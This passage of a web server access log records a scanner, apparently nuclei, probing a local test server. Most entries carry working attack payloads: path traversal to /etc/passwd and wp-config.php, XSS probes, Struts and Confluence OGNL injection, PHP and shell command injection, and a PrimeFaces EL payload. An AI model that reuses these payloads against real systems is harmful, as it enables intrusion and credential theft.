(Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.167","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfcache.map HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/85 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.072","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.072","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /-/snippets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"{\x22client\x22:\x22wheel_async\x22,\x22fun\x22:\x22pillar_roots.write\x22,\x22data\x22:\x22testing\x22,\x22path\x22:\x22../../../../../../../tmp/testing\x22,\x22username\x22:\x221\x22,\x22password\x22:\x221\x22,\x22eauth\x22:\x22pam\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi2/status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /frontend/web/debug/default/view HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.087","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fileserver/test.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboardUser HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.172","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('297MTtX5EYC9hXUUofzIkAoEVlI')%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.180","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appliance/login.ns HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wiki/pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"login=AEE&last_page=&username=admin&password=admin&submit=Login&JS_SWITCH=JS_ON","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ZMC_Admin_Login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"{\x22username\x22:\x22nuclei_297MTqEcVnz9ly2ZcvsogPA0KDo\x22,\x22password\x22:\x22297MTm5Abro3Ki11GGKKAlkS6YP\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/signup/step2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graph_cms HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.187","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/debug/default/view HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.090","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aims/ps/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.svn/entries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.078","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /private-key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Electron/download/windows/%5Cwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('297MTtX5EYC9hXUUofzIkAoEVlI')%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.078","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.072","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /camunda/app/welcome/default/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.186","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/ HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.072","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.080","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/doenterpagevariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v2/_catalog HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.072","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=cat /etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.171","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ViewUserHover.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gsearch.php.en?prod=';prompt`document.domain`;// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.072","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 